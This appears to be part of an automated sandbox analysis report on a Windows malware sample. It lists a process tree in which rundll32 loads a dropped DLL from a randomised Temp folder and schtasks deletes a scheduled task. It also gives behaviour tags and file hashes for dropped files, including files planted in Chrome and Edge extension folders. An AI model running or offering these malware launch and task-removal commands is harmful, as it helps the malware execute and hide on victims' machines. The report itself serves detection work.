C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\QwGxxFGD\sOpDwtd.dll",#1 /gksite_idTwy 3851181⤵PID:3972
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\QwGxxFGD\sOpDwtd.dll",#1 /gksite_idTwy 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4860 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"3⤵PID:3288
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5e52c5f27d440a16cf43d6196c581fe39
SHA170d3056f2cd4ae1b63685097d4f9d1b5b62c392a
SHA2564d5ec1b482acad14f79f8baab5a4690eb2195d59ed3907592e179a02bc5ffac1
SHA5126e2a606bcfebe9a294a5841a521b9d1552c328ffe1fbd7ee02579f27ed6f755159ef824458a9823f6ff031ebdde8178911031e77ca204b2b2a1659ef7e5e3cd3
-
Filesize
2KB
MD5ac58d8838e121bef8f75a92dca634207
SHA1f82553f7e06cb18f1f7cd886b1dd609842d107cf
SHA256a23198364bd279e64e3095df26552a84ddd204a757824723f12e402346e91718
SHA5121d39c09b6a2c15829c1a3435548cb34c9254d14bbe44065daef559859f7f23b8a8a4394688eac6265c0bb147f5f74f0e17088c2c9da49164368a6c76f8443b35
-
Filesize
2KB
MD568da26a4c6176eb8872a8ad1e117299b
SHA1e8c43dad6d30b4526e28cb5f5bddd6a534df1242
SHA256ddd787ca6a95ccb508310a7386c641a608e3efa8a05a2e0ca5e5a17d999375f1
SHA512340189a385944a239257aa8a19275a65431cbc88ac0a6e6749ef4af20f2c88b43536776a4c51e1ee06babc6d835b904f7f41fb81301092427b1b8f555cc5268a
-
Filesize
2KB
MD52417935af10b7678fcbfd06096bea3f8
SHA17f268c492561b4c160ff393f54e4de7e45548dc3
SHA25611b3d53f4676188d2f2619dfccea7a676a792f7f358226d4f15638fcb4f6e1ee
SHA5128af90152733b8efc2367d98573c8bd098a76ea5db67a5a687a743a6440a40633a38f75311f2d3fad77cf70b1b4fefe9d36538455d7ef0ddaa59c89a93519563a
-
Filesize
1.2MB
MD5e26e9b23c822729ce07b399aad9d0d72
SHA14ebed6e969971710a0030c2f3f18e1a934cee302
SHA2567a9932f04e41b24218bbf03433279a1d31c3b20a378e63b5df9dab9a28f93089
SHA51203d0cb22a603b9c1b5f61dc95446da93730994f4a6706aaaa58cf881df48904e1b121c2f7edfe068ba012e41cc31ebca698932e499f2b0fc9a505a568bc34ef2
-
Filesize
2KB
MD56d8ef2d90acdb5583331d7e4fe2066c0
SHA121f815c1439d70d5465be3ae4ad1db3ac2737909
SHA256ea223cda7a6082d9814c0c0098abf8b861922eeb2f551205828fa55c69836b72
SHA512c7e4fcaca290933cd3569ed832d1da1836213bb2c2bbe0972bbb3a37f6649e26e47d8e58c77be5ba47512d7694877ba1be48e6e76b92bcac38e43c8a82637b7d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD505431732a119f9bcb6869d640805216c
SHA1cd77bf15cb5750cb42a5b03b5437860cd50d8e8f
SHA2563e498d2d8040f225bb0dcf09ead81c7ca0eb50380877857024c9866b1b2244b4
SHA512dd974987ecb33b40268713f961b1e2c268956b150d3339133164471705aa895299f948c7951f3f8b424222f8388e5a205bbfe4c941478baafff0caf211c542ff
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5c39affe48af3a432b122209caf1b02d3
SHA1abae25369616f090cb2155f5dfa14f6848d1b011
SHA2560070f916e346744645babdec2004e3360e7791f1b4ca21a6fdcec8a1f6da7f94
SHA5123c51b2e6c31764511e0af9acee6f028cc21fc9949103b5faca4c5229b601adc9c915abe24883bbd924f5ce235b8c2a6ce0adca93fa51bbfe97d0f8617845b539
-
Filesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
Filesize
6.1MB
MD554cf9527f73a0d28bf69246206aabd36
SHA16b599bf0bcc0acf66a5b684da6b6fb2d8d78e21b
SHA256a012cfb372597e52fed61023ce017a383a61dfd36efb868e84f50ddb13d01da7
SHA512e133daf721d247863ace8837b56e3276935fa61f4096e5c62d4e03652914dd99c07b2d70e8e08eda4f3a94a8def31eaec29b3231364d2cd0749a61f51573be3e
-
Filesize
6.1MB
MD554cf9527f73a0d28bf69246206aabd36
SHA16b599bf0bcc0acf66a5b684da6b6fb2d8d78e21b
SHA256a012cfb372597e52fed61023ce017a383a61dfd36efb868e84f50ddb13d01da7
SHA512e133daf721d247863ace8837b56e3276935fa61f4096e5c62d4e03652914dd99c07b2d70e8e08eda4f3a94a8def31eaec29b3231364d2cd0749a61f51573be3e
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD5f91d7d0779d7f42c61e72748a0463995
SHA1c77c44592e25586c0cee5b545f23a8375d29c270
SHA256386f17bdc33e09b621664445a4c623dc6216c09cf82d4077f280be5724429f5f
SHA51215c66e8bf8f5cb93eedbd0f66db2dd62e968ef7d4e5c99b55cdfebffe54bee2b0b450bd4f005dd7a094c823bc9af708213955707708a5a47daf5929af3f7ab35
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5cc9f4513b700de5fb0962921bd1cb88c
SHA1fb65f3ea4aca980c1840b1d90898ea874b1f8594
SHA2566a141819098de4445c6fdf6354d14800004c95860a90ec3efa6547858dad609a
SHA512673f80bd9686f2b634f6039674d53554af6543c75233eaf8f4bea3b02bad5575c064002703611f7eee3fa87bcad0db63655830e75d8fc619e2ef2105082e5219
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.9MB
MD524a387fda6e0f36f9af44d65487c5f5b
SHA1a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61
-
Filesize
6.1MB
MD51222bfa91cf9fe10eafa052931c1cb49
SHA18fe5908d3e9d0b92e9ceac7fbd5fd2325486ba02
SHA25612cfae426c58bf2b830e9bdceee82be2c6140254e4a6d58f02a2d37118b149f9
SHA5124e9ba14dd60d79e928067fb6c868df766266ba842c146e144b7ff5286d05775214a35129bbc92fdc253d0afc87e85b0fb34efc49cc359fc24de3dd4f17f521e4
-
Filesize
6.1MB
MD51222bfa91cf9fe10eafa052931c1cb49
SHA18fe5908d3e9d0b92e9ceac7fbd5fd2325486ba02
SHA25612cfae426c58bf2b830e9bdceee82be2c6140254e4a6d58f02a2d37118b149f9
SHA5124e9ba14dd60d79e928067fb6c868df766266ba842c146e144b7ff5286d05775214a35129bbc92fdc253d0afc87e85b0fb34efc49cc359fc24de3dd4f17f521e4
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732